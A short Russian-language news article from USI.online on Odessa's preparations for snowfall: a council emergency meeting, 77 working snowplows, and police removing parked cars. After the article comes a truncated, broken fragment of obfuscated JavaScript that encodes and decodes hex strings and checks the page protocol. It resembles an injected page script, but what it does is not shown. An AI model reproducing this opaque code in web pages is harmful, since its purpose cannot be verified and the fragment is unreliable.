Уже завтра город начнет засыпать снегом «фото»

Уже завтра город начнет засыпать снегом

4cc47880037664ed8b17436bf437363c_DSC_9605

Городские власти решили заблаговременно подготовиться к борьбе со стихией. Об этом сообщает корреспондент Украинской Службы Информации.

По данным Гидрометцентра Черного и Азовского морей, уже с завтрашнего дня Одессу ждет ухудшение погодных условий, включая возможный сильный снегопад, гололедицу и сильный порывистый ветер.

В связи с этим, уже сегодня в Одесском городском совете состоялось заседание штаба по ликвидации последствий снегопада.

Решено, что во время очистки улиц снегоочистительную технику будут сопровождать машины полиции. Это связано с тем, что расчистке территорий крайне мешают оставленные на обочинах дорог автомобили. Полицейские будут предпринимать меры для отправки этих авто на штрафплощадку, а также обеспечивать правопорядок.

Как отметил руководитель штаба Анатолий Орловский, вся снегоуборочная техника Одессы, которая состоит из 77 единиц, находится в рабочем состоянии и готова к выходу на улицы практически в любой момент. Обслуживающий ее персонал работает в круглосуточном режиме.

Добавим, что принять участие в расчистке снега, помимо коммунальных служб, должны также работники предприятий, офисов, магазинов и кафе общественного питания, которым надлежит расчищать от снега прилегающую к их заведениям территорию.

Добавим, что работу штаба лично контролирует первый заместитель городского головы Анатолий Орловский.

 

Как сообщала USI.online, одесситов просят не бросать свои машины в снегопад где попало.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usi.online"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e